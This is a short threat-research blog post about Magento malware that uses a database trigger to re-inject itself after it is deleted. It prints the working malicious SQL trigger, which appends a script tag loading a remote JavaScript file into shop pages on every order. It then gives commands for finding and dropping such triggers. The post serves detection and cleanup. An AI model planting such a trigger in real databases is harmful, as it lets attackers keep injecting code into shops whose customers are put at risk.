Self-healing malware restores itself after deletion

by Sansec Forensics Team

Published in Threat Research − February 14, 2017

Self-healing malware restores itself after deletion

Regular Javascript-based malware is normally injected in the static header or footer HTML definitions in the database. Cleaning these records used to be sufficient to get rid of the malware. But not anymore: this week a new malware pattern surfaced. Once deleted, it uses a clever database trigger to restore itself.

The pattern was discovered by Jeroen Boersma (excellent detective job!). He found the following database trigger (edited for readability):

TRIGGER `after_insert_order` 
AFTER INSERT ON `sales_flat_order` FOR EACH ROW
BEGIN
	UPDATE core_config_data 
	SET value = IF(
		value LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%', 
		value, 
		CONCAT(value, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>')
	) 
	WHERE path='design/head/includes' 
		OR path='design/footer/absolute_footer' 
		OR path='design/footer/copyright';\

	UPDATE cms_block 
	SET content= IF(
		content LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%', 
		content, 
		CONCAT(content, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>')
	);
END;

The trigger is executed every time a new order is made. The query checks for the existence of the malware in the header, footer, copyright and every CMS block. If absent, it will re-add itself.

This discovery shows we have entered a new phase of malware evolution. Just scanning files is not enough anymore, malware detection methods should now include database analysis.

Check your own database

Do you have persistent malware hidden in your database?

echo 'SHOW TRIGGERS' | n98-magerun db:console

NB. Magento Enterprise and some community extensions contain legitimate triggers. So if you find triggers, look for suspicious SQL code, such as anything containing admin, .js, script or < (html tags).

If you find a malicious trigger, you can delete it like this:

echo "DROP TRIGGER <trigger_name>" | n98-magerun db:console

Attack context

For future reference: the entry vector for this malware was a brute force attack on /rss/catalog/notifystock/ for an otherwise completely patched shop.